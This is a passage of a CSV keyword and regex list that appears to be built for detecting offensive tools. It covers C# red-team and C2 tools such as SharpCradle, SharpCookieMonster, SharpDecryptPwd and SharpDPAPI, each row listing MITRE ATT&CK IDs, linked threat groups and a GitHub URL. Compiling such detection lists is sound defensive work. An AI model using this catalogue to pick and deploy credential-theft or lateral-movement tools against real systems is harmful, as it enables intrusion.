fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","58877" "*SharpCOMManager.cs*",".{0,1000}SharpCOMManager\.cs.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","58878" "*sharpcompile*.exe*",".{0,1000}sharpcompile.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","SharpCompile is an aggressor script for Cobalt Strike which allows you to compile and execute C# in realtime. This is a more slick approach than manually compiling an .NET assembly and loading it into Cobalt Strike. 
The project aims to make it easier to move away from adhoc PowerShell execution instead creating a temporary assembly and executing ","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/SpiderLabs/SharpCompile","1","1","N/A","N/A","10","10","291","58","2020-08-07T12:49:36Z","2018-11-01T17:18:52Z","58879" "*sharpCompileHandler*",".{0,1000}sharpCompileHandler.{0,1000}","offensive_tool_keyword","cobaltstrike","SharpCompile is an aggressor script for Cobalt Strike which allows you to compile and execute C# in realtime. This is a more slick approach than manually compiling an .NET assembly and loading it into Cobalt Strike. 
The project aims to make it easier to move away from adhoc PowerShell execution instead creating a temporary assembly and executing ","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/SpiderLabs/SharpCompile","1","1","N/A","N/A","10","10","291","58","2020-08-07T12:49:36Z","2018-11-01T17:18:52Z","58880" "*SharpCompileServer*",".{0,1000}SharpCompileServer.{0,1000}","offensive_tool_keyword","cobaltstrike","SharpCompile is an aggressor script for Cobalt Strike which allows you to compile and execute C# in realtime. This is a more slick approach than manually compiling an .NET assembly and loading it into Cobalt Strike. 
The project aims to make it easier to move away from adhoc PowerShell execution instead creating a temporary assembly and executing ","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/SpiderLabs/SharpCompile","1","1","N/A","N/A","10","10","291","58","2020-08-07T12:49:36Z","2018-11-01T17:18:52Z","58881" "*SharpCompileServer.exe*",".{0,1000}SharpCompileServer\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","SharpCompile is an aggressor script for Cobalt Strike which allows you to compile and execute C# in realtime. 
This is a more slick approach than manually compiling an .NET assembly and loading it into Cobalt Strike. The project aims to make it easier to move away from adhoc PowerShell execution instead creating a temporary assembly and executing ","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/SpiderLabs/SharpCompile","1","1","N/A","N/A","10","10","291","58","2020-08-07T12:49:36Z","2018-11-01T17:18:52Z","58882" "*SharpConfigParser.dll*",".{0,1000}SharpConfigParser\.dll.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - 
TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","10","1668","270","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z","58883" "*SharpCookieMonster*",".{0,1000}SharpCookieMonster.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","1","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","58884" "*sharpcookiemonster*",".{0,1000}sharpcookiemonster.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","1","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","58885" "*SharpCookieMonster*WebSocket4Net.dll*",".{0,1000}SharpCookieMonster.{0,1000}WebSocket4Net\.dll.{0,1000}","offensive_tool_keyword","SharpCookieMonster","This C# project will dump cookies for all sites. 
even those with httpOnly/secure/session","T1539 - T1606","TA0008 - TA0002","N/A","N/A","Exploitation tool","https://github.com/m0rv4i/SharpCookieMonster","1","1","N/A","N/A","N/A","3","202","44","2023-03-15T09:51:09Z","2020-01-22T18:39:49Z","58886" "*SharpCookieMonster.csproj*",".{0,1000}SharpCookieMonster\.csproj.{0,1000}","offensive_tool_keyword","SharpCookieMonster","This C# project will dump cookies for all sites. even those with httpOnly/secure/session","T1539 - T1606","TA0008 - TA0002","N/A","N/A","Exploitation tool","https://github.com/m0rv4i/SharpCookieMonster","1","1","N/A","N/A","N/A","3","202","44","2023-03-15T09:51:09Z","2020-01-22T18:39:49Z","58887" "*SharpCookieMonster.exe*",".{0,1000}SharpCookieMonster\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","58888" "*SharpCookieMonster.exe*",".{0,1000}SharpCookieMonster\.exe.{0,1000}","offensive_tool_keyword","SharpCookieMonster","This C# project will dump cookies for all sites. 
even those with httpOnly/secure/session","T1539 - T1606","TA0008 - TA0002","N/A","N/A","Exploitation tool","https://github.com/m0rv4i/SharpCookieMonster","1","1","N/A","N/A","N/A","3","202","44","2023-03-15T09:51:09Z","2020-01-22T18:39:49Z","58889" "*SharpCookieMonster.sln*",".{0,1000}SharpCookieMonster\.sln.{0,1000}","offensive_tool_keyword","SharpCookieMonster","This C# project will dump cookies for all sites. even those with httpOnly/secure/session","T1539 - T1606","TA0008 - TA0002","N/A","N/A","Exploitation tool","https://github.com/m0rv4i/SharpCookieMonster","1","1","N/A","N/A","N/A","3","202","44","2023-03-15T09:51:09Z","2020-01-22T18:39:49Z","58890" "*SharpCookieMonsterOriginal.exe*",".{0,1000}SharpCookieMonsterOriginal\.exe.{0,1000}","offensive_tool_keyword","SharpCookieMonster","This C# project will dump cookies for all sites. even those with httpOnly/secure/session","T1539 - T1606","TA0008 - TA0002","N/A","N/A","Exploitation tool","https://github.com/m0rv4i/SharpCookieMonster","1","1","N/A","N/A","N/A","3","202","44","2023-03-15T09:51:09Z","2020-01-22T18:39:49Z","58891" "*SharpCradle*logonpasswords*",".{0,1000}SharpCradle.{0,1000}logonpasswords.{0,1000}","offensive_tool_keyword","cobaltstrike","SharpCradle is a tool designed to help penetration testers or red teams download and execute .NET binaries into memory.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - 
T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/anthemtotheego/SharpCradle","1","1","N/A","N/A","10","10","279","57","2020-12-30T17:15:51Z","2018-10-23T06:21:53Z","58892" "*SharpCradle.exe*",".{0,1000}SharpCradle\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","SharpCradle is a tool designed to help penetration testers or red teams download and execute .NET binaries into memory.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt 
Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/anthemtotheego/SharpCradle","1","1","N/A","N/A","10","10","279","57","2020-12-30T17:15:51Z","2018-10-23T06:21:53Z","58893" "*SharpCradle.exe*",".{0,1000}SharpCradle\.exe.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","1","N/A","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","58894" "*SharpCrashEventLog*",".{0,1000}SharpCrashEventLog.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","1","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","58895" "*SharpCrashEventLog.exe*",".{0,1000}SharpCrashEventLog\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","58896" "*SharpDcomTrigger.exe*",".{0,1000}SharpDcomTrigger\.exe.{0,1000}","offensive_tool_keyword","SharpSystemTriggers","Collection of remote authentication triggers in C#","T1078 - T1059.001 - T1550","TA0008 ","N/A","N/A","Lateral Movement","https://github.com/cube0x0/SharpSystemTriggers","1","1","N/A","N/A","10","5","483","57","2024-05-15T21:24:56Z","2021-09-12T18:18:15Z","58897" "*SharpDecryptPwd *",".{0,1000}SharpDecryptPwd\s.{0,1000}","offensive_tool_keyword","SharpDecryptPwd","Decrypt Navicat,Xmanager,Filezilla,Foxmail,WinSCP,etc","T1003.008 - T1555.004 - T1552.002","TA0006","N/A","N/A","Credential Access","https://github.com/RowTeam/SharpDecryptPwd","1","0","N/A","N/A","10","8","769","117","2022-03-04T02:49:31Z","2022-02-25T11:21:43Z","58898" "*SharpDecryptPwd.Commands*",".{0,1000}SharpDecryptPwd\.Commands.{0,1000}","offensive_tool_keyword","SharpDecryptPwd","Decrypt Navicat,Xmanager,Filezilla,Foxmail,WinSCP,etc","T1003.008 - T1555.004 - T1552.002","TA0006","N/A","N/A","Credential Access","https://github.com/RowTeam/SharpDecryptPwd","1","0","N/A","N/A","10","8","769","117","2022-03-04T02:49:31Z","2022-02-25T11:21:43Z","58899" "*SharpDecryptPwd.csproj*",".{0,1000}SharpDecryptPwd\.csproj.{0,1000}","offensive_tool_keyword","SharpDecryptPwd","Decrypt Navicat,Xmanager,Filezilla,Foxmail,WinSCP,etc","T1003.008 - T1555.004 - 
T1552.002","TA0006","N/A","N/A","Credential Access","https://github.com/RowTeam/SharpDecryptPwd","1","0","N/A","N/A","10","8","769","117","2022-03-04T02:49:31Z","2022-02-25T11:21:43Z","58900" "*SharpDecryptPwd.exe*",".{0,1000}SharpDecryptPwd\.exe.{0,1000}","offensive_tool_keyword","SharpDecryptPwd","Decrypt Navicat,Xmanager,Filezilla,Foxmail,WinSCP,etc","T1003.008 - T1555.004 - T1552.002","TA0006","N/A","N/A","Credential Access","https://github.com/RowTeam/SharpDecryptPwd","1","1","N/A","N/A","10","8","769","117","2022-03-04T02:49:31Z","2022-02-25T11:21:43Z","58901" "*SharpDecryptPwd.exe*",".{0,1000}SharpDecryptPwd\.exe.{0,1000}","offensive_tool_keyword","SharpDecryptPwd","Decrypt Navicat,Xmanager,Filezilla,Foxmail,WinSCP,etc","T1003.008 - T1555.004 - T1552.002","TA0006","N/A","N/A","Credential Access","https://github.com/RowTeam/SharpDecryptPwd","1","1","N/A","N/A","10","8","769","117","2022-03-04T02:49:31Z","2022-02-25T11:21:43Z","58902" "*SharpDecryptPwd.Lib*",".{0,1000}SharpDecryptPwd\.Lib.{0,1000}","offensive_tool_keyword","SharpDecryptPwd","Decrypt Navicat,Xmanager,Filezilla,Foxmail,WinSCP,etc","T1003.008 - T1555.004 - T1552.002","TA0006","N/A","N/A","Credential Access","https://github.com/RowTeam/SharpDecryptPwd","1","0","N/A","N/A","10","8","769","117","2022-03-04T02:49:31Z","2022-02-25T11:21:43Z","58903" "*SharpDecryptPwd.Properties*",".{0,1000}SharpDecryptPwd\.Properties.{0,1000}","offensive_tool_keyword","SharpDecryptPwd","Decrypt Navicat,Xmanager,Filezilla,Foxmail,WinSCP,etc","T1003.008 - T1555.004 - T1552.002","TA0006","N/A","N/A","Credential Access","https://github.com/RowTeam/SharpDecryptPwd","1","0","N/A","N/A","10","8","769","117","2022-03-04T02:49:31Z","2022-02-25T11:21:43Z","58904" "*SharpDir.exe*",".{0,1000}SharpDir\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","58905" "*SharpDllProxy*",".{0,1000}SharpDllProxy.{0,1000}","offensive_tool_keyword","SharpDllProxy","Retrieves exported functions from a legitimate DLL and generates a proxy DLL source code/template for DLL proxy loading or sideloading","T1036 - T1036.005 - T1070 - T1070.004 - T1071 - T1574.002","TA0002 - TA0003 - TA0004","N/A","N/A","Defense Evasion","https://github.com/Flangvik/SharpDllProxy","1","1","N/A","N/A","N/A","8","792","102","2020-07-21T17:14:01Z","2020-07-12T10:46:48Z","58906" "*SharpDomainSpray*",".{0,1000}SharpDomainSpray.{0,1000}","offensive_tool_keyword","SharpDomainSpray","Basic password spraying tool for internal tests and red teaming","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/HunnicCyber/SharpDomainSpray","1","0","N/A","N/A","10","1","90","18","2020-03-21T09:17:48Z","2019-06-05T10:47:05Z","58907" "*SharpDomainSpray.*",".{0,1000}SharpDomainSpray\..{0,1000}","offensive_tool_keyword","SharpDomainSpray","Basic password spraying tool for internal tests and red teaming","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/HunnicCyber/SharpDomainSpray","1","1","N/A","N/A","10","1","90","18","2020-03-21T09:17:48Z","2019-06-05T10:47:05Z","58908" 
"*SharpDomainSpray-master*",".{0,1000}SharpDomainSpray\-master.{0,1000}","offensive_tool_keyword","SharpDomainSpray","Basic password spraying tool for internal tests and red teaming","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/HunnicCyber/SharpDomainSpray","1","1","N/A","N/A","10","1","90","18","2020-03-21T09:17:48Z","2019-06-05T10:47:05Z","58909" "*SharpDoor.exe*",".{0,1000}SharpDoor\.exe.{0,1000}","offensive_tool_keyword","SharpDoor","SharpDoor is alternative RDPWrap written in C# to allowed multiple RDP (Remote Desktop) sessions by patching termsrv.dll file.","T1059 - T1085 - T1070.004","TA0008 - TA0002 - TA0009","N/A","N/A","Defense Evasion","https://github.com/infosecn1nja/SharpDoor","1","1","N/A","N/A","7","4","311","61","2019-09-30T16:11:24Z","2019-09-29T02:24:07Z","58910" "*SharpDoor-master*",".{0,1000}SharpDoor\-master.{0,1000}","offensive_tool_keyword","SharpDoor","SharpDoor is alternative RDPWrap written in C# to allowed multiple RDP (Remote Desktop) sessions by patching termsrv.dll file","T1112 - T1055 - T1562.001","TA0003 - TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/infosecn1nja/SharpDoor","1","0","N/A","N/A","9","4","311","61","2019-09-30T16:11:24Z","2019-09-29T02:24:07Z","58911" "*SharpDoor-master*",".{0,1000}SharpDoor\-master.{0,1000}","offensive_tool_keyword","SharpDoor","SharpDoor is alternative RDPWrap written in C# to allowed multiple RDP (Remote Desktop) sessions by patching termsrv.dll file.","T1059 - T1085 - T1070.004","TA0008 - TA0002 - TA0009","N/A","N/A","Defense Evasion","https://github.com/infosecn1nja/SharpDoor","1","1","N/A","N/A","7","4","311","61","2019-09-30T16:11:24Z","2019-09-29T02:24:07Z","58912" "*SharpDPAPI backupkey *",".{0,1000}SharpDPAPI\sbackupkey\s.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - 
domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","N/A","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","58913" "*SharpDPAPI backupkey*",".{0,1000}SharpDPAPI\sbackupkey.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","SharpDPAPI","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","58914" "*SharpDPAPI backupkey*",".{0,1000}SharpDPAPI\sbackupkey.{0,1000}","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112 - T1649","TA0006 - TA0002","N/A","Conti","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","0","N/A","N/A","10","10","1232","215","2024-06-27T13:39:08Z","2018-08-22T17:39:31Z","58915" "*SharpDPAPI backupkey*",".{0,1000}SharpDPAPI\sbackupkey.{0,1000}","offensive_tool_keyword","SharpDPAPI","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - 